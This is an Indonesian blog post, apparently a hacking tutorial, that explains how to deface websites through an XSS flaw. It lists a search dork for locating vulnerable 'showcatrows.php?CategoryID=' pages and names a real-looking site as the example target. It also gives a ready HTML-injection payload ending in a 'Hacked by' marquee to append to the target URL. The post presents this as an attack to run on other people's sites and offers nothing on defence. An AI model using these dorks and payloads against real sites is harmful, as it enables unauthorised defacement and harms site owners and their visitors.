XSS Vulnerability adalah suatu cara memasukan code/script HTML kedalam suatu website dan dijalankan melalui browser di client. Ok deh, Langsung aja kita bahas bersama Cara Deface Website Menggunakan Teknik XSS Vulnerability ini.
1. Masukkan Dorknya → inurl:"/showcatrows.php?CategoryID="
2. Pilih Website yang akan di deface
ex: http://www.examsolutions.co.uk/...?CategoryID=13
3. Tambahkan kode HTML deface di akhir URL 'target'
Kode: "><marquee><h1>Hacked by Saya Berbagii Blog</h1></marquee>
Menjadi: http://www.examsolutions.co.uk/...?CategoryID=13"><marquee><h1>Hacked by Saya Berbagii Blog | Just visit http://sayaberbagii.blogspot.com/</h1></marquee>
Yang berwarna merah bisa Anda tukar dengan apa yang Anda mau
4. Tekan 'Enter' dan lihat hasilnya..
Cara yang digunakan sangat simple, kita memanfaatkan celah keamanan pada XSS sebuah website dan memasukan sebuah code/script HTML.
0 komentar:
Posting Komentar